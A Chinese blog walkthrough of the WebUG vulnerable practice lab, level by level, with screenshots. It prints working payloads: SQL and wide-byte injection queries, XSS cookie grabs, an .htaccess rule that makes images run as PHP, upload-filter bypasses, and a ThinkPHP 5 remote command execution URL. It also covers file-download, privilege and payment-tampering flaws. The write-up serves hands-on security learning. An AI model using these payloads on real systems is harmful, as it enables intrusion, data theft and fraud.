去年写的,写完就忘记了。第二关到第五关记得当时嫌麻烦没搞。。凑合看吧
推下导航页面,
![v2-65c693bc4626e93c098f556f3b8eb099_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/0c20aa2fa32eef78d216a714fa53146b.jpeg)
第一关 显错注入
打开页面,猜测URL是注入点,单引号测试,成功报错。
![v2-58f7fd4aad8ec61c8437812a80e9ed68_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/04b908fbcc93e79c88401c385a264353.jpeg)
查询字段长度
1'order by 2--+ 回显正常
1'order by 3--+ 报错
字段长度为2
查询数据库名,可以看到,只有第二个字段有输出。
![v2-c112528639cb594f753532d342de66dd_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/6e594aceb7cac61c5118176641c5f4e8.jpeg)
如此使用group_concat()进行查询。
![v2-454c60809919e0e8331a6b43ed3f7871_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/821454a21bd5a24676a3630567ee39cb.png)
1'union select 1,group_concat(table_name) from information_schema.tables where table_schema='webug'--+
![v2-12ddd940548b350729b8fae8983e58ba_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/3c30ed41144128bed038c938ae123953.png)
?id=1' union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'--+
![v2-f736f91b081a13052bb63326543753fd_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/30d15b4c3fea6e1bb7c65aa0e289ede6.png)
读取flag
?id=1' union select 1,flag from flag--
![v2-f578ce36909cc98896b190089f433fc7_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/5f587a6281cc6beb62b2a8c3c6a6a6c2.png)
第六关宽字节注入
![v2-478cd2ed11644fc343b2dfb64c2fd41f_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/fbb722fd9e81388a4091865ba07bfdda.png)
?id=1%df%27%20union%20select%201,group_concat(0x7e,user(),0x7e,database())--+
![v2-5f71e5b0ff4ad5de95f8d8ef27bf49ef_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/5e2ebfc26a90f14127a1e31ef97e7341.png)
这里爆出来的数据库不对。。应该是webug ,不愧是webug,bug真不少。
因为是宽字节注入,单引号被过滤了,所以使用16进制绕过
?id=1%df%27%20and%201=2%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x7765627567--+
![v2-b6f181e5f77845518e2d42d2af662882_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/82a4f507aa1de9c6262e41ae2dffeb39.png)
获得env_list的列,然后获得flag即可
?id=1%df%27%20and%201=2%20union%20select%201,envFlag%20from%20webug.env_list%20limit%2051--+
![v2-0db245d358a867499894bcea9246d4ac_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/3dbcbfaf70cb5cdab093f8bef64e0936.png)
本来只需要select flag from flag 即可。但是一直报错,语句没有问题。。
![v2-b6986d8c73dfb1bc790ede0366be7d90_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/b82a1883c24f481468186732b548a37c.png)
第七关 XXE注入
这题打开是个登录页面,直接抓包,然后说是xxe,但是没有xxe的特点。
![v2-c583e323e258b6d868b7ccc7f5263004_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/d77e1c3ffdb6dadf42cfbf143a4f6e01.png)
尝试构造xxe,window下文件读取,
![v2-5e8a3edadf5af0cce435cc778fe1c3e8_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/01a4d9b69b8f50b6af595c2bb62924a6.png)
因为本题没有flag,,所以在本地创建了一个flag文件。
然后通过url加密,发包,成功读取到文件。
![v2-9d4b737176d0e7bf8649c34dc6ddc282_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/4910efd1d6d0b31e82372187d8baa188.jpeg)
第九关反射性XSS
打开之后,网页其他链接都打不开,也没有留言页面之类的可插入的地方,只有一个id=1的URL , 对这个url尝试注入,不过不是个注入点。
![v2-58a4deb76da64232d77cb8cd545b205c_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/c417dd2abc8d61e62256debdb2fbed14.png)
做完之后经过百度发现还可以直接获取cookie,使用 "document.cookie"
效果如下
![v2-1003bddf17977f2bddfa685b86a718e9_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/4af8bd9df9d61163e56ce26894431495.png)
第十关 存储型XSS
打开页面,看到最下面有个留言界面。
![v2-980ece25cecf55ed11f151c35b206a71_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/253b2dde01d869b3a905f2f46c87c5ba.png)
就直接尝试弹窗代码,<script>alert(1)</script>
![v2-3af0131b58fe573bbe39eab218c25692_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/dc65d1ca08a70cf8f4a2179884f13c9a.jpeg)
获取cookie
![v2-bff70960e1e3d90929ecb897326f6e95_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/132578725cefb3c5a78fe1b54481659a.jpeg)
第十一关万能密码
万能密码的本质就是sql注入恒等于。
构造 账号 admin
密码 '
![v2-b6fe508318e6721accbf90c39aeac66a_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/2f0f73b49cfabb6195b42212854b3b1f.jpeg)
登录成功
![v2-07f08ee44be356902df185ceb7913303_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/0159d129a5414f0ce82d0df1ede83a24.png)
第十三关 过滤XSS
打开页面,反射xss的页面,尝试构造xss,结果弹窗警告、
![v2-0405b2353c38974d029a5e98b743441f_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/b20cf54cef51104568cc579f77b2e38c.png)
尝试大写绕过,失败
发现被过滤script
![v2-8b40115c3298221adbaaf286f3b3e057_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/7c715cc6aea63457603b3de6558141ad.png)
使用标签绕过,
第十四关链接注入
第一次听说这个,简单概括,
是因为未对用户输入的危险字符进行一个正确的清理,。
连接注入是一种修改站点内容的行为。方式就是将恶意链接嵌入被攻击的网站内,然后诱导他人点击。
防御方式就是过滤字符串。
本题就是在url中嵌套url跳转链接,如下
![v2-1742b44294a4c8e3daef5221ed62aaa4_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/e7c62e69365f0e9ed187aed301708ee3.png)
当我点击靶场的时候,将会自动跳转到192.168.80.84
第十五关任意文件下载
打开 页面,
![v2-9dd1ef1bd91e83f6726b5dd190eb413a_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/bc4cd1c54a3e1c753e974132f06569f1.png)
获取下载链接
![v2-6f699672350c9cfac271cffa6ada8bb9_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/5ea72ec921835bb9577c27a75f3348c8.png)
分析链接
![v2-260dbe3d284b2706515bdf749d191b56_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/1f807c27e3c74b44b68de9e149765096.png)
尝试下载其他文件,比如网站根目录下的 flag.txt,成功
![v2-f02990609da8b2f86667a16206b83aec_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/3347463677fdf3adb46d7d644cde72b1.png)
下载系统敏感文件
![v2-1ff181126a6886b3f2d98df6060c6c94_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/a6b9fe23c75ff0b5724e3acddd5188f2.png)
下载网站源码
![v2-acdadc16393d77e3b36924ca82def848_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/e19edb7b034a2abc42e4b82e15a6a2c7.png)
第十六关mysql配置文件下载
和上面一关差不多,只不过这个是要求下载mysql的配置文件。
![v2-c7b38a9fe0fa235c5120de326aec0a6a_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/089d704ff4c504b8dd333133b751ff63.png)
第十七关文件上传(前端拦截)
PHP内容,图片后缀。使用burp抓包,修改后缀为php,然后发包
![v2-e793e008b86a5e6ae8bd78949d8695f1_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/b7f9cea9c2ded4f722c504bb2b4c57e5.png)
![v2-68db6a20f40e2d2b70b9c9f6a0aafa65_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/eefd32449a7cdea8debf6f1214d8ad94.png)
成功执行
![v2-5c021f43c9537e6bdd2d5249c0267b0a_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/a570bcfc79eeb1294069ad156f77e4b2.jpeg)
第十八关文件上传解析漏洞
首先绕过前端js,再通过特殊字符进行绕过
![v2-d32568b65661433a5ea2242183a92dce_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/940dcc9b2ef84095dcc80950860f29ca.png)
![v2-adf70d028b86661f272860effb5877f2_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/346f6b79c123efcb45cea59af962ee98.png)
第十九关文件上传(畸形文件)
绕过前端js,上传一个php文件看下回显
![v2-ffd8f0c9ca698a395c042ff4e9171328_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/a462cf919ddb143be082bd4f21b0ea13.png)
发现后缀被去掉了,尝试大小写绕过,失败。
尝试双写绕过,成功
![v2-d234a40eaa2d5ee23478f2ceda85d245_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/1ffb3b31ce056efd6117487e8764124a.png)
![v2-3400ba60e22015882a14422880b5fa9c_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/543fe3f1e37c6de1d36ba5aa4f7cbfc7.png)
第二十关文件上传(截断上传)
一开始陷入误区,看到截断就想到00,后来才想到利用window的特性,文件名不能存在\ :/类似的字符,于是上传paylaod如下
![v2-5f578a89ed0572e9f85b3a48e5127195_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/3370fa278de6702d88cc8c9260f43d38.png)
然后浏览器打开info.php
![v2-bb142b9e957674bb8dbaef9189ce05ef_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/32ffdce7b3fec408571c963a16d5e4d4.png)
第二十一关文件上传(htaccess)
apache解析漏洞环境要求
php5.6以下且不带nts的版本,
允许上传.htaccess文件,
常见的有两种写法:
第一种,如果文件名为shell.gif将会被解析为php
<FilesMatch "shell.gif">SetHandler application/x-httpd-php AddHandler php5-script .gif </FilesMatch> |
第二种,当前目录下的所有后缀为.gif的文件都会被当作php执行
AddType application/x-httpd-php .jpg |
我这里上传的时第二种,
这里webug的环境有问题,需要自己修改源码,不修改的话正常的图片也无法下载。
![v2-4033afef8e73f29c95f38917afc0bbea_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/c899aaa7ff4dbb2a9c24d1dc1d049a92.png)
然后在上传一张jpg的图片马即可。
![v2-7a7367a8beccce5ed5ff9ff6d4017126_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/be3cf678ab01fe7bc586dfd755377915.png)
第二十二关 越权修改密码
![v2-1cd4a735de93b53bf323a3d075856a16_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/432aedd8d5d05d969b90f91568b9bece.jpeg)
两个账号,admin/admin root/root
使用 admin/admin登录 ,然后修改密码,并抓包
![v2-01a6209488c9b431a916d72a2a60f66f_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/5c3771df43b596068ae07ef1d53ae2e2.png)
id改为2 然后发包,然后重新登录root账号,发现密码被修改为123456789
![v2-399806d8e043a0e71967e9a5b3ea3cc6_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/c3a40ed238592d872903e6cb16b1204d.jpeg)
第二十三关 支付漏洞
打开页面,随便选择一个商品点击购买。看到url的参数,随手进行更改。比如-100.
![v2-f4fc834563e37e8defd19d0024187013_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/f85032ffaee5560de763e202449f20af.png)
可以看到。一分钱没花,还赚了100.发家致富只在一瞬间。。
![v2-b198062a8ac0809da761ebc0e4bf3a53_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/a32d72faf54d55948728766086e89b60.png)
![v2-558136a097d4b101f0956ed1f5116a13_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/9bba3c2942f7606b0f7bbb6d3dcbae6c.png)
第二十四关 邮箱轰炸
注册个邮箱,然后抓包,,就开始进行批量发包,轰炸,
轰炸,ddos说白了就是批量请求。
![v2-d572ef40023beef84615a231633778a8_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/4ec4d18d2b5dedf48ec938e9ffbfdfae.png)
burpsuite payload设置如下,即可无限批量法发包,进行ddos。
![v2-9e792fe5d9f79ed427ff16ff2febcdb0_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/895f283bc30d3acf5a859bfa090ee1d6.png)
第二十五关 越权查看admin
使用root账号登录
![v2-c51bed0e681122c8b8d96d89ab216214_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/09250db03aa061e6ec2378e7d6f0ab6b.jpeg)
一眼就看出来了,修改下id,果然直接显示admin
![v2-a267d0b2d3cfe435522d5b83b140e379_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/3577d8418ba0c04d345d3690458b88dc.png)
![v2-b9b5dbde913afcdde2f5c1c00391ad92_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/644e785b888046431e24ab3b36d88358.png)
第二十六关URL跳转
打开网站,看到百度的标签,点击并抓包,,
![v2-5f68258bd0cf9e2e575040de7b3b8d35_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/4c7a3de347981b2c9f70600dffcd8e09.png)
看到URL请求
![v2-70b43d68c5019d87d822e9a4b40ea768_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/b9b02d4ba5478da723f58ec57437fd0d.png)
修改url然后进行发包,但是并未跳转,,点击标红按钮进行重定向。
![v2-ce1a37450a925a8c1ee2baeb3c0c5938_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/ff6a17eb6a8f09e8a6dacf9cf2b940eb.jpeg)
成功跳转
![v2-1b152be25799a9b4eb80bd2fd962c960_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/03647d66bc1597c813d0124586e9b04c.jpeg)
第二十七关文件包含漏洞
打开首先看到url在目录遍历。。
![v2-ff57c7b4d6579b8367490f053fad7b96_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/b1fdc73fab23887da3a0a39ad13162f8.png)
想起来之前在C盘根目录下还创建了一个flag.txt,直接尝试读取、成功
![v2-2f1c568e26e8fa02b563b92a4002b4bc_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/0b895ee7bc4908bdf9174845a47286ae.png)
利用此漏洞进行读取网页源代码。读取成功。
![v2-49dc7477c0b8b40fcfef235ac599690f_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/8d62509e6654d2ca318552d3f7e7e92f.jpeg)
第二十八关命令执行
打开页面,熟悉的ThinkPHP V5
![v2-1a729c39bddfe3fb2d99ea7f3056dacc_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/332dd81b088b428c529528a00375ed82.png)
手工利用
http://192.168.58.144/control/more/tp5/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
![v2-8e3a3b49210d7886261cd450de0262eb_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/5ab60b66aaabf60ce07cf3dea123b9c3.png)
查找flag文件
![v2-22f15fdde278969c6fb0ef3a02b3fada_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/63da70e07984ec4888e7da0638306bf7.png)
![v2-37c89addf5d08ec71a9a5a16cd73c782_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/88b3ef066affe4500e5242ec65880416.png)